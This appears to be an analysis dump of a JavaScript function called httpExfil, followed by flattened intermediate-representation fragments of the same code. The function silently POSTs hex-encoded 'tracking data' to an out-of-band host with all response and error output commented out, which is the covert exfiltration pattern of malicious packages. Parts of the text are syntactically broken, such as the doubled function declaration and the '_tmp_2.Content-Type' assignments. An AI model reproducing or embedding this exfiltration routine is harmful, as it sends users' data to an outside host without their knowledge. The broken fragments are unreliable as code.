function httpExfil = function httpExfil(trackingDataHex) {
    var postData = "data=" + trackingDataHex;
    const options = {
        hostname: OOB_Hostname,
        port: 443,
        path: "/",
        method: "POST",
        headers: {
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": postData.length,
        },
    };
    var req = https.request(options, (res) => {
        res.on("data", (d) => {
            // process.stdout.write(d);
        });
    });

    req.on("error", (e) => {
        // console.error(e);
    });

    req.write(postData);
    req.end();
}
var postData = "data=" + trackingDataHex
const options = {
        hostname: OOB_Hostname,
        port: 443,
        path: "/",
        method: "POST",
        headers: {
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": postData.length,
        },
    }
_tmp_1.hostname = OOB_Hostname
_tmp_1.port = 443
_tmp_1.path = "/"
_tmp_1.method = "POST"
_tmp_1.headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": postData.length,
        }
_tmp_2.Content-Type = "application/x-www-form-urlencoded"
_tmp_2.Content-Length = postData.length
var req = https.request(options, (res) => {
        res.on("data", (d) => {
            // process.stdout.write(d);
        });
    })
req.on("error", (e) => {
        // console.error(e);
    })
req.write(postData)
